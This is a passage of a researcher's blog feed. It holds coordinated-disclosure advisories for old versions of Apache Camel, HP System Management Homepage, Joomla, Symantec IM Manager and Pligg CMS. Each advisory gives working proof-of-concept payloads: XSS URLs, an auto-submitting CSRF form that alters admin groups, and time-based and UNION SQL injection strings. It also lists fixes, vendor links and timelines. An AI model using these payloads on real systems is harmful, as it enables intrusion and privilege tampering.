href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/6VADuQr_1eM/oracle-iplanet-web-server-709-multiple.html" title="Oracle iPlanet Web Server 7.0.9 Multiple Cross-Site Scripting (XSS) Vulnerabilities" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/oracle-iplanet-web-server-709-multiple.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkACR387cSp7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-8268843855577431430</id><published>2012-04-29T03:50:00.002+08:00</published><updated>2012-05-11T14:46:06.109+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:46:06.109+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="Apache" /><title>Apache Camel 2.7.0 Multiple Cross-Site Scripting (XSS) Vulnerabilities</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Apache Camel is a versatile open-source integration framework based on known Enterprise Integration Patterns. Camel empowers you to define routing and mediation rules in a variety of domain-specific languages, including a Java-based Fluent API, Spring or Blueprint XML Configuration files, and a Scala DSL.&lt;br /&gt;&lt;br /&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered multiple Cross-Site Scripting vulnerabilities in&amp;nbsp;Apache Camel. These issues were discovered in a default installation of&amp;nbsp;Apache Camel 2.7.0. Other earlier versions may also be affected.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Reflected XSS&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;===========&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]:8161/demo/portfolioPublish?count=1&amp;amp;refresh='"--&amp;gt;&amp;lt;/style&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(/XSS/)&amp;lt;/script&amp;gt;&amp;amp;stocks=SUNW&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Permanent XSS&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;============&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]:8161/camel/endpoints/mock:someName&amp;lt;iframe src="javascript:alert('Permanent XSS')"&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;To trigger&amp;nbsp;Permanent&amp;nbsp;XSS:&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;====================&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]:8161/camel/endpoints&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;a href="http://4.bp.blogspot.com/-qDpL-D2EuZ0/T5xIiTH_aZI/AAAAAAAAAFs/P67ngNM_vhQ/s1600/Apache+ActiveMQ-5.5.0-XSS-02.PNG"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-qDpL-D2EuZ0/T5xIiTH_aZI/AAAAAAAAAFs/P67ngNM_vhQ/s400/Apache+ActiveMQ-5.5.0-XSS-02.PNG" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Update to version 2.7.2 or later.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Reference&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="https://issues.apache.org/jira/browse/CAMEL-3991" style="font-family: Verdana, sans-serif;" target="_blank"&gt;https://issues.apache.org/jira/browse/CAMEL-3991&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;2011-05-06 - Vulnerabilities discovered.&lt;br /&gt;2011-05-06 - Vulnerabilities reported to Secunia.&lt;br /&gt;2011-05-06 - Secunia confirmed the vulnerabilities and contacted the vendor.&lt;br /&gt;2011-05-19 - Patch released.&lt;br /&gt;2011-05-19 - Advisory published by Apache.&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/tU7iv40oPkg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/8268843855577431430/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/apache-camel-270-cross-site-scripting.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/8268843855577431430?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/8268843855577431430?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/tU7iv40oPkg/apache-camel-270-cross-site-scripting.html" title="Apache Camel 2.7.0 Multiple Cross-Site Scripting (XSS) Vulnerabilities" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-qDpL-D2EuZ0/T5xIiTH_aZI/AAAAAAAAAFs/P67ngNM_vhQ/s72-c/Apache+ActiveMQ-5.5.0-XSS-02.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/apache-camel-270-cross-site-scripting.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkAMQ3o6fyp7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-198896788747903708</id><published>2012-04-29T02:40:00.001+08:00</published><updated>2012-05-11T14:46:22.417+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:46:22.417+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="CSRF" /><category scheme="http://www.blogger.com/atom/ns#" term="HP" /><title>HP System Management Homepage 6.2.2.7 Cross-Site Request Forgery (CSRF) Vulnerability</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;HP System Management Homepage is a web-based interface that consolidates and simplifies the management of individual ProLiant and Integrity servers running Microsoft Windows or Linux operating systems, or HP 9000 and HP Integrity servers running HP-UX 11i.&lt;br /&gt;&lt;br /&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Request Forgery vulnerability in&amp;nbsp;HP System Management Homepage. This issue was discovered in a default installation of&amp;nbsp;HP System Management Homepage 6.2.2.7. Other earlier versions may also be affected.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;form action="https://[target]:2381/proxy/SetSMHData" id="csrf" method="post"&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="admin-group" value="Users" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="operator-group" value="" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="user-group" value="" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/form&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;document.getElementById('csrf').submit();&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;HP has provided HP System Management Homepage v7.0 or subsequent to resolve the vulnerabilities.&amp;nbsp;Please see the references for more information.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03280632" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03280632&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Secunia:&amp;nbsp;&lt;/span&gt;&lt;a href="http://secunia.com/advisories/43012/" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://secunia.com/advisories/43012/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;2011-01-21 - Vulnerability discovered.&lt;br /&gt;2011-01-21 - Vulnerability reported to Secunia.&lt;br /&gt;2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.&lt;br /&gt;2012-04-11 - Advisory published by Secunia&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;since it has been coordinated for more than a year.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;2012-04-19 - Patch released.&lt;br /&gt;2012-04-20 - Advisory updated by Secunia.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/p36_z-CmXGs" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/198896788747903708/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/hp-system-management-homepage-6227.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/198896788747903708?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/198896788747903708?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/p36_z-CmXGs/hp-system-management-homepage-6227.html" title="HP System Management Homepage 6.2.2.7 Cross-Site Request Forgery (CSRF) Vulnerability" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/hp-system-management-homepage-6227.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0IARHo-cSp7ImA9WhJREEg.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-431402194534749656</id><published>2012-04-29T02:17:00.002+08:00</published><updated>2012-07-12T10:19:05.459+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-07-12T10:19:05.459+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="SQL Injection" /><title>Joomla! CMS 2.5.1 Blind SQL Injection Vulnerability</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Joomla! is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently.&lt;br /&gt;&lt;br /&gt;Stratsec&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;vulnerability&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;researcher, Sow Ching Shiong&amp;nbsp;has discovered&amp;nbsp;Blind SQL Injection&amp;nbsp;vulnerability&amp;nbsp;in&amp;nbsp;Joomla!&amp;nbsp;CMS. This issue was discovered in a default installation of&amp;nbsp;Joomla!&amp;nbsp;CMS 2.5.1. Other earlier versions may also be affected.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: orange; font-family: Verdana, sans-serif;"&gt;&lt;b&gt;Proof of concept URLs which will cause a time delay of 30 seconds are provided below:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]/[path]/index.php/using-joomla/extensions/components/search-component/smart-search?Itemid=466&amp;amp;option=1&amp;amp;q=3&amp;amp;searchword=Search...&amp;amp;task=search'%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]/[path]/joomla/index.php?Itemid=%27%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(30))A)%2b%27&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]/[path]/joomla/index.php?option=1&amp;amp;searchword={searchTerms}&amp;amp;Itemid='%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Update to version 2.5.2 or later.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="http://developer.joomla.org/security/news/391-20120301-core-sql-injection.html" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://developer.joomla.org/security/news/391-20120301-core-sql-injection.html&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Stratsec:&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.stratsec.net/Research/Advisories/Joomla-CMS-Blind-SQL-Injection-(SS-2012-004)" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://www.stratsec.net/Research/Advisories/Joomla-CMS-Blind-SQL-Injection-(SS-2012-004)&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;2012-02-29 - Vulnerability discovered.&lt;br /&gt;2012-02-29 - Vulnerability reported to vendor.&lt;br /&gt;2012-03-01 - Vendor&amp;nbsp;acknowledged and confirmed&amp;nbsp;the vulnerability.&lt;br /&gt;2012-03-05 - Patch released.&lt;br /&gt;2012-03-19 - Advisory published by Stratsec.&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/S0jABwgbqqw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/431402194534749656/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/joomla-cms-251-blind-sql-injection.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/431402194534749656?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/431402194534749656?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/S0jABwgbqqw/joomla-cms-251-blind-sql-injection.html" title="Joomla! CMS 2.5.1 Blind SQL Injection Vulnerability" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><thr:total>1</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/joomla-cms-251-blind-sql-injection.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ak8FQHw8fSp7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-8422688309593199919</id><published>2012-04-29T01:28:00.001+08:00</published><updated>2012-05-11T14:46:51.275+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:46:51.275+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="SQL Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="Symantec" /><title>Symantec IM Manager 8.4.17 SQL Injection and Cross-Site Scripting (XSS) Vulnerabilities</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Symantec IM Manager offers instant messaging management and security with support for public IM networks and enterprise IM platforms including AOL, Jabber, IBM Lotus Instant Messaging, ICQ, MSN Messenger, Microsoft Live Communications Server, Reuters, Yahoo! and GoogleTalk.&lt;br /&gt;&lt;br /&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in&amp;nbsp;Symantec IM Manager. These issues were discovered in a default installation of&amp;nbsp;Symantec IM Manager 8.4.17. Other earlier versions may also be affected.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;SQL Injection&lt;br /&gt;==========&lt;/span&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]/IMManager/admin/IMAdminPolicyEnfQry.asp?PolicyEnfType=-1%20UNION%20ALL%20SELECT%20null,(char(126)%2bchar(39)%2b(Select%20@@version)%2bchar(39)%2bchar(126))--&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;a href="http://4.bp.blogspot.com/-6TkVks0Wh6U/T5woLihAuMI/AAAAAAAAAFg/6OuRC0u2eqs/s1600/Symantec-IM-SQL-Injection-PoC.JPG"&gt;&lt;img border="0" height="198" src="http://4.bp.blogspot.com/-6TkVks0Wh6U/T5woLihAuMI/AAAAAAAAAFg/6OuRC0u2eqs/s400/Symantec-IM-SQL-Injection-PoC.JPG" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Cross-Site Scripting (XSS)&lt;br /&gt;====================&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]/IMManager/admin/IMAdminSystemDashboard.asp?post=yes&amp;amp;refreshRateSetting='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&amp;amp;menuitem=newReports&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav=reports&amp;amp;menuitem='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]/IMManager/admin/IMAdminEdituser.asp?action='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;a href="http://1.bp.blogspot.com/-fo9eG7rmgso/T5wlkbSvdrI/AAAAAAAAAFU/_G-xRy0JvZk/s1600/Symantec-IM-XSS-PoC.jpg"&gt;&lt;img border="0" height="211" src="http://1.bp.blogspot.com/-fo9eG7rmgso/T5wlkbSvdrI/AAAAAAAAAFU/_G-xRy0JvZk/s400/Symantec-IM-XSS-PoC.jpg" /&gt;&lt;/a&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Symantec&amp;nbsp;has released patches which address these issues. Please see the references for more information.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&amp;amp;pvid=security_advisory&amp;amp;year=2011&amp;amp;suid=20110929_00" target="_blank"&gt;http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&amp;amp;pvid=security_advisory&amp;amp;year=2011&amp;amp;suid=20110929_00&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Secunia:&amp;nbsp;&lt;/span&gt;&lt;a href="http://secunia.com/advisories/43157/" target="_blank"&gt;http://secunia.com/advisories/43157/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;2011-02-18 - Vulnerabilities discovered.&lt;br /&gt;2011-02-18 - Vulnerabilities reported to Secunia.&lt;br /&gt;2011-02-23 - Secunia confirmed the vulnerabilities and contacted the vendor.&lt;br /&gt;2011-09-29 -&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Patch released.&lt;br /&gt;2011-09-30 -&amp;nbsp;&lt;/span&gt;Advisory published by Secunia.&lt;/span&gt;&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/cm4_DpBt4Nw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/8422688309593199919/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/symantec-im-manager-8417-sql-injection.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/8422688309593199919?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/8422688309593199919?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/cm4_DpBt4Nw/symantec-im-manager-8417-sql-injection.html" title="Symantec IM Manager 8.4.17 SQL Injection and Cross-Site Scripting (XSS) Vulnerabilities" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-6TkVks0Wh6U/T5woLihAuMI/AAAAAAAAAFg/6OuRC0u2eqs/s72-c/Symantec-IM-SQL-Injection-PoC.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/symantec-im-manager-8417-sql-injection.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUQGSXs6fip7ImA9WhVWGEU.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-8878480905885395544</id><published>2012-04-29T01:01:00.000+08:00</published><updated>2012-05-01T23:48:48.516+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-01T23:48:48.516+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><title>Pligg CMS 1.1.4 Cross-Site Scripting (XSS) Vulnerability</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Pligg is an open source CMS (Content Management System) that you can download and use for free. Pligg CMS provides social publishing software that encourages visitors to register on your website so that they can submit content and connect with other users.&lt;br /&gt;&lt;br /&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered&amp;nbsp;Cross-Site Scripting vulnerability&amp;nbsp;in&amp;nbsp;Pligg CMS. This issue was discovered in a default installation of&amp;nbsp;Pligg CMS 1.1.4. Other earlier versions may also be affected.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]/pligg/search.php?adv=1&amp;amp;advancesearch=&amp;amp;nbsp;Search&amp;amp;nbsp;&amp;amp;date=1&amp;lt;/title&amp;gt;&amp;lt;script&amp;gt;alert(/XSS/)&amp;lt;/script&amp;gt;&amp;amp;scategory=1&amp;amp;scomments=1&amp;amp;search=&amp;amp;sgroup=3&amp;amp;slink=3&amp;amp;stags=1&amp;amp;status=all&amp;amp;suser=1&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Update to version 1.2.0 or later.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
